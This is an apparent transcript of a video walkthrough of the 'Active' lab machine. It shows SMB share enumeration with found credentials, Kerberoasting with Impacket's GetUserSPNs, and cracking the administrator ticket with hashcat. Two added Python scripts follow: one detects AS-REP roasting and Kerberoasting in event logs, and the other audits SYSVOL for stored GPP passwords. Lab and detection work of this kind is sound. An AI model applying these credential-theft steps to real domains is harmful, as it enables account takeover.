then you should be able to just paste in your hash and then hit enter, and it will go ahead and decrypt that for us. So it tells us this is the password for this account right here. So what we'll do is we'll go ahead, and once you get it, some notes: we're going to grab this user, paste it in, and then we're going to grab the password so that we have this as well, and now we have those. What we're going to do, what you would normally do, see, I know where we're going to go, because this is really, and I've done this box before, but when you see this SVC_TGS, this is telling me this is a ticket granting service, and within Active Directory you can have tickets for each user, and this right here grants tickets for the user. So if we can somehow grant ourselves a ticket, or get a ticket, or get a hash, then we get on this box, so that's what ultimately we're going to do. Especially when you see this TGS, this ticket granting service, then you need to be thinking Kerberoasting, or doing something with Kerberoast. But also something that's really common that you're going to see on Active Directory is this will be a TGT, and it's a ticket granting ticket, and it's the ticket we need in order to get on to the network. So that's a lot of ticket saying, but anytime you're dealing with Active Directory you're going to hear it a lot; those are just a couple of little acronyms that you need to be aware of. So with that, what you would do in a normal situation, when you don't know what you're doing and you grab a user and a username, is you're just going to go ahead and you're going to run smbmap again. So we just go smbmap, and then we're going to go, I think it's a capital U, we'll just type in --help and make sure that we do this right. So we're going to have a user this time; it is a lowercase u and a lowercase p. So what we will do, it tells us a password or an NTLM hash. This NTLM hash, we're going to see this later; this hash is one that we're going to pull down from an Active Directory network, a domain
controller can give us this NTLM hash. Sometimes you can grab these with Responder, which we're also going to see later, so it caught me off guard when I saw that NTLM hash; I didn't realize that was a part of smbmap, so that's interesting. So note that, because we are going to see that later. We're not going to use the hash in order to grab this later, in order to go into smbmap later, but it's always useful to know that we can do this in the future, just in case we have this hash and we're not able to crack it. So what this gives us, the usage here, so the way we're going to do this is we're going to smbmap -u, and our username was SVC_TGS, and our password was GPP still standing strong, we'll paste that in, and then it looks like we give it the host, which is 10.10.10.100, and then this should run and it'll tell us if we have access to any other shares that we didn't have access to before. And we do: we have access to Users, we have access to SYSVOL, now we have this NETLOGON, and so in a normal situation what you're going to do is you're going to go ahead and you will look in all these that we now have read access to, so that we can enumerate some more. But we're not actually going to go that route, because that's not the route we need to go, but you just go through and you do the exact same thing we just did in order to find this user and this password, and you just go ahead and look through here and see if you can find any more information that would help you gain access to the network. And so, to show you real quick, you can see the difference up here: we anonymously had read only right here, but now that we have a user we have access to different shares, and this will be helpful. Sometimes you will find a user, or you'll have anonymous login and you'll only have access to one share, and then you'll find another user and you'll have access to two shares, and then you'll find another user and you'll finally be able to get onto the network. That does happen, and it does take time,
and it does take time to go through and enumerate all of these, but you just got to be patient and run through the enumeration the way it's supposed to be done.

We're going to continue on with the box Active. I'm going to show you two different tools from Impacket. First, uh, we'll just come over here, and this is what it looks like: it's impacket-GetNPUsers, and then it's the domain controller, the IP, so we give it the IP, we give it the name, which is active.htb. A lot of times you're going to see in Hack The Box this has htb, but elsewhere you're going to see this is the username.local; we're actually going to see one later that has a .local, and then the username. Let's pretend we found a username but we don't have a password, and so what we would do is we'd try and go -no-pass and see if we can get a TGT from this service. And so, unfortunately, we're going to run it but we're not able to get a TGT, but we are going to see this again; we're going to try this again in another box in the future, and I don't actually remember if it works or not, so we will try it out and see if we can get this TGT. If you get a ticket back you can do a pass the ticket attack, and the tickets last you usually, I think it's 10 hours default by Windows, so you can use that ticket. I also see that I got this IP wrong. You can use that ticket and see what you're able to have access to, and we're going to go ahead and we're going to show another Impacket tool, so it will look like this: impacket-Get, and I think that it is UserSPNs, yes, it's this one. See, here's a box that was done as spooky.local; that one I think is from TryHackMe, if I'm remembering right. Now we'll go ahead and type in our active.htb/SVC_TGS, we can delete this, and then we'll go ahead and we'll paste in our password here so that we can get this hash. So as you can see, Impacket, we're going to use Impacket here once, we're going to here use it again twice, and then we're going to use it a third time
to actually get our shell on this box. So it's really important for us to use Impacket and to know how to use it and to make sure you have it; I told you before, earlier in this course, that if any penetration tester is told they can have one tool, this is usually the tool they're going to go after. So for some reason this doesn't seem to want to run. All right, so the problem turned out to be I had a dash right here and it needed to be an underscore, so now that we've got that resolved, what we can see is we now have the name administrator here that it has spit out for us, and it did not give us the hash. So we're going to go ahead and run this again. Oh, it says that the clock skew is too great. Okay, so this is my box clock, my Kali Linux box right here; the time does not match the time on the Kerberos Windows machine right here, so you can see the difference. So this error, you are going to get this every single time you ever run this; every single time I've run this it always tells me the clocks don't match. I think you have to be within an hour, and I don't remember how to fix this, so you just paste it in here and there's going to be a simple way to update this clock in one of these up here. So we'll go ahead and paste that in, and it's going to tell us how to fix this. So because our time is not linked, and the mitigation for it, this is what we're looking for, maybe it'll be in this GitHub page. I will go ahead and find this and bring you back once I have the mitigation for this.

It turns out what you end up having to do is type in sudo apt install ntpdate; go ahead and run it, it will install, and then in order to link up your time you just type in sudo ntpdate and then the IP address, and you hit enter, and that will go ahead and update the time. Then you'll go back over to the Active Directory box that we're working on and you'll go ahead and run this command and you will get this output, and so we have the administrator name here and this is their ticket. So go ahead and
copy that, and we'll cd into Desktop, htb, and then we'll go into active, and then we're going to name this gedit hash.txt, and we will paste in the hash and we can save it, and we're going to use hashcat to crack this. We'll type in cat, and then hashcat, hashcat, and then we can go ahead and copy this, paste it in here, and we're told we need to use 13100, and so that will be the hashcat type we're going to use. So we'll go ahead and type in hashcat -m 13100 hash.txt -a, and we're going to use the word list rockyou, so we'll go ahead and locate rockyou.txt, we will copy this, and now we can go hashcat all over again: -m 13100, and then we'll go hash, and then we'll paste in the directions to our word list, and we'll see if that runs. This will take a minute, so I will bring you back once hashcat is finished running.

All right, hashcat has finished running, and here is the password for this hash. You can go ahead and copy this and we'll go gedit notes, and we can type in, all right, I think the user was administrator, so we can come up here, and it's on a different link, but it's administ, admin-is-trator, and then this is the password, and we're going to go ahead and log into that in the next video. But what we just did is called Kerberoasting: so we had the ticket granting service and it reached out to the domain controller and we were able to pull down the administrator with their hash, and with that we were able to crack it and grab this password. And so in the next video, because there is no WinRM on this box, we're going to go and get a shell on this Active Directory network in a different way, and with that, I'll see you there.
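The AS-REP roasting step (GetNPUsers against an account with pre-authentication disabled) and the Kerberoasting step (GetUserSPNs followed by hashcat -m 13100) each leave a recognisable trail in the domain controller's Security log. As an added example that is not part of the video, this Python script flags both patterns in constructed sample events: the field names follow the Windows Security log events 4768 and 4769, while the values, the burst threshold and the time window are assumptions.

```python
"""Flag AS-REP roasting and Kerberoasting in Windows Security events.

Added example, not from the video. A GetNPUsers run shows up as a 4768
(TGT request) with Pre-Authentication Type 0 and an RC4 ticket; a
GetUserSPNs run shows up as a burst of 4769 (service ticket request)
events for RC4 tickets to several service accounts from one client.
The records below are constructed; thresholds and window are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4-HMAC (what hashcat 13100/18200 crack)
NO_PREAUTH = "0"    # PreAuthType 0 on a 4768: the account had pre-authentication disabled
SUCCESS = "0x0"     # Kerberos status for a ticket actually issued

# Constructed sample events (not real log data); times are ISO-8601.
SAMPLE_EVENTS = [
    {"EventID": 4768, "Time": "2023-02-10T10:00:01", "TargetUserName": "svc-alfresco",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"EventID": 4768, "Time": "2023-02-10T10:00:02", "TargetUserName": "alice",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50", "Status": "0x0"},
    {"EventID": 4769, "Time": "2023-02-10T10:01:00", "TargetUserName": "svc_tgs@ACTIVE.HTB",
     "ServiceName": "SVC_TGS", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"EventID": 4769, "Time": "2023-02-10T10:01:01", "TargetUserName": "svc_tgs@ACTIVE.HTB",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"EventID": 4769, "Time": "2023-02-10T10:01:02", "TargetUserName": "svc_tgs@ACTIVE.HTB",
     "ServiceName": "httpsvc", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5", "Status": "0x0"},
    # Machine-account and AES tickets are ordinary traffic.
    {"EventID": 4769, "Time": "2023-02-10T10:01:03", "TargetUserName": "bob@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50", "Status": "0x0"},
    {"EventID": 4769, "Time": "2023-02-10T10:01:04", "TargetUserName": "carol@ACTIVE.HTB",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.51", "Status": "0x0"},
    # One RC4 request from a legacy client stays below the burst threshold.
    {"EventID": 4769, "Time": "2023-02-10T10:01:05", "TargetUserName": "dave@ACTIVE.HTB",
     "ServiceName": "httpsvc", "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.52", "Status": "0x0"},
]


def _ts(ev):
    return datetime.fromisoformat(ev["Time"])


def is_asrep_roast(ev):
    """4768: an RC4 TGT was issued to an account that did no pre-authentication."""
    return (ev["EventID"] == 4768 and ev["Status"] == SUCCESS
            and ev["PreAuthType"] == NO_PREAUTH
            and ev["TicketEncryptionType"] == RC4_HMAC)


def is_rc4_service_ticket(ev):
    """4769: an RC4 service ticket for a user service account (not machine, not krbtgt)."""
    if ev["EventID"] != 4769 or ev["Status"] != SUCCESS:
        return False
    if ev["TicketEncryptionType"] != RC4_HMAC:
        return False
    svc = ev["ServiceName"]
    return not svc.endswith("$") and svc.lower() != "krbtgt"


def detect(events, min_spns=2, window=timedelta(minutes=5)):
    """Return alerts: one per AS-REP roast, one per source that requests RC4
    tickets for at least min_spns distinct services inside the window."""
    alerts = []
    rc4_by_source = defaultdict(list)
    for ev in events:
        if is_asrep_roast(ev):
            alerts.append({"kind": "asrep_roast", "user": ev["TargetUserName"],
                           "source": ev["IpAddress"], "time": ev["Time"]})
        elif is_rc4_service_ticket(ev):
            rc4_by_source[ev["IpAddress"]].append(ev)
    for source, evs in rc4_by_source.items():
        evs.sort(key=_ts)
        for i, first in enumerate(evs):
            burst = [e for e in evs[i:] if _ts(e) - _ts(first) <= window]
            services = sorted({e["ServiceName"] for e in burst})
            if len(services) >= min_spns:
                alerts.append({"kind": "kerberoast", "source": source,
                               "requester": first["TargetUserName"],
                               "services": services, "time": first["Time"]})
                break  # one alert per source
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Environments that still have legacy clients will see lone RC4 requests; tune min_spns and the window to the baseline before alerting on them.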
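The Groups.xml pulled from the Replication share above is a Group Policy Preferences file, and any cpassword attribute left in SYSVOL is readable by every domain user. As an added example that is not part of the video, this Python scanner reports where such values sit (file, element, account) without decrypting anything; the XML content and the directory layout it builds are constructed samples.

```python
"""Audit Group Policy Preferences XML under SYSVOL for stored cpassword values.

Added example, not from the video. It walks a SYSVOL-like tree, parses the
GPP XML types that can carry a cpassword attribute, and reports each
element that still stores one. Nothing is decrypted. Sample XML and the
directory layout are constructed.
"""
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP file types that can carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed Groups.xml: one local user with a stored password, one group entry without.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="SVC_TGS" changed="2018-07-18 20:46:06">
    <Properties action="U" userName="SVC_TGS" cpassword="CONSTRUCTED-BASE64-BLOB"
                changeLogon="0" noChange="1" neverExpires="1"/>
  </User>
  <Group name="Administrators (built-in)" changed="2018-07-18 20:50:00">
    <Properties action="U" groupName="Administrators (built-in)"/>
  </Group>
</Groups>
"""

# Constructed Drives.xml: a mapped drive with stored credentials.
SAMPLE_DRIVES_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives>
  <Drive name="H:" changed="2018-07-19 09:00:00">
    <Properties action="U" path="\\\\fileserver\\home" userName="ACTIVE\\mapper"
                cpassword="CONSTRUCTED-BASE64-BLOB-2"/>
  </Drive>
</Drives>
"""


def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per element whose Properties carry a non-empty cpassword."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        props = elem.find("Properties")  # direct child only, as in GPP files
        if props is None or not props.get("cpassword"):
            continue
        account = (props.get("userName") or props.get("accountName")
                   or props.get("runAs") or elem.get("name") or "?")
        findings.append({"file": source, "element": elem.tag,
                         "account": account, "changed": elem.get("changed", "")})
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL-like tree and collect findings from every GPP XML file."""
    findings = []
    for path in sorted(Path(root_dir).rglob("*.xml")):
        if path.name not in GPP_FILES:
            continue
        try:
            text = path.read_text(encoding="utf-8-sig")  # GPP files often carry a BOM
            findings.extend(find_cpasswords(text, str(path)))
        except ET.ParseError:
            continue  # malformed file: skip it rather than abort the audit
    return findings


def build_sample_sysvol(base):
    """Lay out a constructed Policies tree containing the two samples plus a decoy."""
    pol = Path(base) / "active.htb" / "Policies" / "{CONSTRUCTED-GUID}"
    groups_dir = pol / "Machine" / "Preferences" / "Groups"
    drives_dir = pol / "User" / "Preferences" / "Drives"
    groups_dir.mkdir(parents=True)
    drives_dir.mkdir(parents=True)
    (groups_dir / "Groups.xml").write_text(SAMPLE_GROUPS_XML, encoding="utf-8")
    (drives_dir / "Drives.xml").write_text(SAMPLE_DRIVES_XML, encoding="utf-8")
    (pol / "Machine" / "Registry.xml").write_text("<RegistrySettings/>", encoding="utf-8")
    return base


def audit_sample():
    """Run the scanner over the constructed tree in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_sysvol(build_sample_sysvol(tmp))


if __name__ == "__main__":
    for f in audit_sample():
        print(f"{f['file']}: <{f['element']}> account {f['account']} (changed {f['changed']})")
```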
Info
Channel: Ryan John
Views: 7,180
Id: JCicKrCO6A0
Length: 74min 59sec (4499 seconds)
Published: Fri Feb 10 2023